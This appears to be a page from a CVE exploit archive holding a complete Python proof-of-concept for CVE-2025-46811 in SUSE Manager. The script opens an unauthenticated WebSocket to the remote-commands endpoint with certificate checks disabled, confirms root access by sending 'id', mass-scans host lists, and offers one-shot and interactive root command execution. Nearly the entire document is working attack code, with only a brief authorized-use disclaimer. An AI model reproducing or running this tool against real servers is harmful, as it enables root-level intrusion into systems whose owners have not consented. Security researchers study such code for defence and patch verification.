4837 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2025-46811.py PY
#!/usr/bin/env python3
import asyncio
import websockets
import ssl
import argparse
from concurrent.futures import ThreadPoolExecutor
from typing import List, Tuple, Optional
import logging
from colorama import Fore, Style, init

# Initialize colorama for colored terminal output; autoreset=True is requested
# so that styling does not have to be reset manually after each print.
init(autoreset=True)

class SUSEManagerExploiter:
    """Proof-of-concept client for the SUSE Manager issue CVE-2025-46811.

    Every network operation opens a WebSocket to
    ``wss://<host>/rhn/websocket/minion/remote-commands``, sends one text
    message and reads one reply. The class offers a single-host probe, a
    concurrent multi-host probe, one-shot command execution and an
    interactive prompt built on top of the one-shot call.

    TLS certificate and hostname verification are disabled for all
    connections made through this class.

    Only for use against systems the operator is explicitly authorized to
    assess.
    """
    
    def __init__(self, debug: bool = False):
        """Create the shared TLS context and configure logging.

        Args:
            debug: When True, debug-level messages are shown by
                ``_debug_print`` and the logging level is set to DEBUG.
        """
        self.ssl_context = ssl.create_default_context()
        # Verification is switched off: the peer certificate and hostname are
        # never validated, so the remote end's identity is not checked.
        self.ssl_context.check_hostname = False
        self.ssl_context.verify_mode = ssl.CERT_NONE
        self.debug = debug
        self._setup_logging()

    def _setup_logging(self):
        """Configure the ``logging`` module and create ``self.logger``.

        The level is DEBUG when ``self.debug`` is set, otherwise INFO.

        NOTE(review): no other method of this class uses ``self.logger``;
        they all print through ``_debug_print`` instead.
        """
        logging.basicConfig(
            level=logging.DEBUG if self.debug else logging.INFO,
            format=f'{Fore.CYAN}%(asctime)s{Style.RESET_ALL} - %(levelname)s - %(message)s',
            handlers=[logging.StreamHandler()]
        )
        self.logger = logging.getLogger(__name__)

    def _debug_print(self, message: str, level: str = "info"):
        """Print ``message`` prefixed with a colored ``[LEVEL]`` tag.

        Args:
            message: Text to print.
            level: One of "debug", "info", "warning", "error", "critical".
                Any other value is printed in white.

        Messages whose level is exactly "debug" are suppressed unless
        ``self.debug`` is True.
        """
        # The color lookup lowercases the level before matching.
        color = {
            "debug": Fore.BLUE,
            "info": Fore.GREEN,
            "warning": Fore.YELLOW,
            "error": Fore.RED,
            "critical": Fore.RED + Style.BRIGHT
        }.get(level.lower(), Fore.WHITE)

        # NOTE(review): this comparison is case-sensitive, unlike the lookup
        # above, so e.g. "DEBUG" is printed even when self.debug is False.
        if self.debug or level != "debug":
            print(f"{color}[{level.upper()}]{Style.RESET_ALL} {message}")

    async def check_vulnerability(self, host: str, timeout: int = 5) -> Tuple[str, bool, str]:
        """Probe one host and report whether it answers as vulnerable.

        Sends the text ``id`` over the WebSocket and waits up to 2 seconds
        for a single reply. The host is reported as vulnerable when the
        reply contains ``uid=0(root)``.

        Args:
            host: Host part used to build both the ``wss://`` URL and the
                ``Origin`` header.
            timeout: Value forwarded to ``websockets.connect``.

        Returns:
            A ``(host, is_vulnerable, message)`` tuple. Any ``Exception``
            raised while connecting, sending or receiving is caught and
            reported as ``(host, False, "Error: ...")``.
        """
        self._debug_print(f"Testing {host}", "debug")
        try:
            async with websockets.connect(
                f"wss://{host}/rhn/websocket/minion/remote-commands",
                ssl=self.ssl_context,
                timeout=timeout,
                extra_headers={"Origin": f"https://{host}"}
            ) as ws:
                self._debug_print(f"Connected to {host}", "info")
                await ws.send('id')
                # The receive wait is fixed at 2 seconds, independent of `timeout`.
                response = await asyncio.wait_for(ws.recv(), timeout=2)
                self._debug_print(f"Received response: {response}", "debug")
                
                if 'uid=0(root)' in response:
                    self._debug_print(f"{host} is vulnerable!", "info")
                    return (host, True, "Vulnerable - root access confirmed")
                # Any reply without the marker is treated as not vulnerable.
                return (host, False, "Unexpected response format")
                
        except Exception as e:
            self._debug_print(f"Error checking {host}: {str(e)}", "error")
            return (host, False, f"Error: {str(e)}")

    async def execute_command(self, host: str, command: str, timeout: int = 10) -> str:
        """Send one command string to ``host`` and return the first reply.

        A new WebSocket connection is opened for every call.

        Args:
            host: Host part used to build both the ``wss://`` URL and the
                ``Origin`` header.
            command: Text sent as-is over the WebSocket.
            timeout: Forwarded to ``websockets.connect`` and also used as the
                maximum wait, in seconds, for the reply.

        Returns:
            The received message, or the string
            ``"Command execution failed: <error>"`` when any ``Exception``
            occurs. Callers cannot distinguish the two cases by type.
        """
        self._debug_print(f"Executing: {command} on {host}", "debug")
        try:
            async with websockets.connect(
                f"wss://{host}/rhn/websocket/minion/remote-commands",
                ssl=self.ssl_context,
                timeout=timeout,
                extra_headers={"Origin": f"https://{host}"}
            ) as ws:
                await ws.send(command)
                response = await asyncio.wait_for(ws.recv(), timeout=timeout)
                self._debug_print(f"Command output: {response}", "debug")
                return response
        except Exception as e:
            error_msg = f"Command execution failed: {str(e)}"
            self._debug_print(error_msg, "error")
            return error_msg

    async def batch_scan(self, hosts: List[str], max_workers: int = 10) -> List[Tuple[str, bool, str]]:
        """Run ``check_vulnerability`` for every host concurrently.

        Args:
            hosts: Hosts to probe.
            max_workers: NOTE(review): accepted but not used in the body;
                all probes are handed to ``asyncio.gather`` at once.

        Returns:
            One ``(host, is_vulnerable, message)`` tuple per input host, as
            returned by ``asyncio.gather``.
        """
        self._debug_print(f"Starting batch scan of {len(hosts)} hosts", "info")
        tasks = [self.check_vulnerability(host) for host in hosts]
        return await asyncio.gather(*tasks)

    async def interactive_shell(self, host: str):
        """Read commands from stdin in a loop and print each reply.

        Typing ``exit`` or ``quit`` (any letter case) or pressing Ctrl-C
        ends the loop. Every command is sent through ``execute_command``,
        which opens its own connection.

        Args:
            host: Target passed to ``execute_command`` for every command.
        """
        self._debug_print(f"Starting interactive session with {host}", "info")
        # NOTE(review): this banner is printed before any connection attempt
        # is made; no connection exists at this point.
        print(f"{Fore.GREEN}[+] Connected to {host} (type 'exit' to quit){Style.RESET_ALL}")
        while True:
            try:
                # input() is a blocking call made from inside a coroutine.
                cmd = input(f"{Fore.YELLOW}remote-shell> {Style.RESET_ALL}")
                if cmd.lower() in ('exit', 'quit'):
                    break
                result = await self.execute_command(host, cmd)
                print(f"{Fore.CYAN}{result}{Style.RESET_ALL}")
            except KeyboardInterrupt:
                self._debug_print("Session terminated by user", "warning")
                break
            except Exception as e:
                # Other errors are reported and the prompt loop continues.
                print(f"{Fore.RED}[!] Error: {e}{Style.RESET_ALL}")

def main():
    """Command-line entry point.

    Two sub-commands are defined:

    * ``scan -i FILE [-o FILE] [-t N]`` reads one host per non-empty line
      from the input file, probes them all and prints a status line per
      host. The hosts reported as vulnerable are written to the output file
      when ``-o`` is given and at least one was found.
    * ``exploit HOST [-c COMMAND]`` sends a single command and prints the
      reply, or starts the interactive prompt when ``-c`` is omitted.

    Only for use against systems the operator is explicitly authorized to
    assess.
    """
    parser = argparse.ArgumentParser(description="SUSE Manager Vulnerability Scanner & Exploiter")
    subparsers = parser.add_subparsers(dest='mode', required=True)

    # Global arguments
    # --debug is registered on the top-level parser, not on the sub-parsers,
    # so on the command line it is given before the sub-command name.
    parser.add_argument('--debug', action='store_true', help='Enable debug output')

    # Scan mode
    scan_parser = subparsers.add_parser('scan', help='Scan for vulnerable hosts')
    scan_parser.add_argument('-i', '--input', required=True, help='Input file containing hosts (IP/Domain)')
    scan_parser.add_argument('-o', '--output', help='Output file for vulnerable hosts')
    scan_parser.add_argument('-t', '--threads', type=int, default=10, help='Concurrent threads')

    # Exploit mode
    exploit_parser = subparsers.add_parser('exploit', help='Execute commands on vulnerable host')
    exploit_parser.add_argument('host', help='Target host (IP/Domain)')
    exploit_parser.add_argument('-c', '--command', help='Single command to execute')

    args = parser.parse_args()
    exploiter = SUSEManagerExploiter(debug=args.debug)

    if args.mode == 'scan':
        # One target per line; blank and whitespace-only lines are skipped.
        with open(args.input) as f:
            targets = [line.strip() for line in f if line.strip()]
        
        exploiter._debug_print(f"Scanning {len(targets)} hosts...", "info")
        # args.threads is passed as batch_scan's max_workers argument.
        results = asyncio.run(exploiter.batch_scan(targets, args.threads))
        
        vulnerable = [host for host, is_vuln, _ in results if is_vuln]
        for host, _, msg in results:
            # Status is decided by looking the host name up in `vulnerable`,
            # not by this row's own flag, so duplicate host entries share a status.
            status = f"{Fore.GREEN}VULNERABLE{Style.RESET_ALL}" if host in vulnerable else f"{Fore.RED}SAFE{Style.RESET_ALL}"
            print(f"{host}: {status} - {msg}")
        
        # Nothing is written when no host was reported as vulnerable.
        if args.output and vulnerable:
            with open(args.output, 'w') as f:
                f.write("\n".join(vulnerable))
            exploiter._debug_print(f"Vulnerable hosts saved to {args.output}", "info")

    elif args.mode == 'exploit':
        if args.command:
            # One-shot mode: print whatever execute_command returns, which is
            # either the reply or its error string.
            print(asyncio.run(exploiter.execute_command(args.host, args.command)))
        else:
            asyncio.run(exploiter.interactive_shell(args.host))

# Run the CLI only when the file is executed as a script, not when imported.
if __name__ == "__main__":
    main()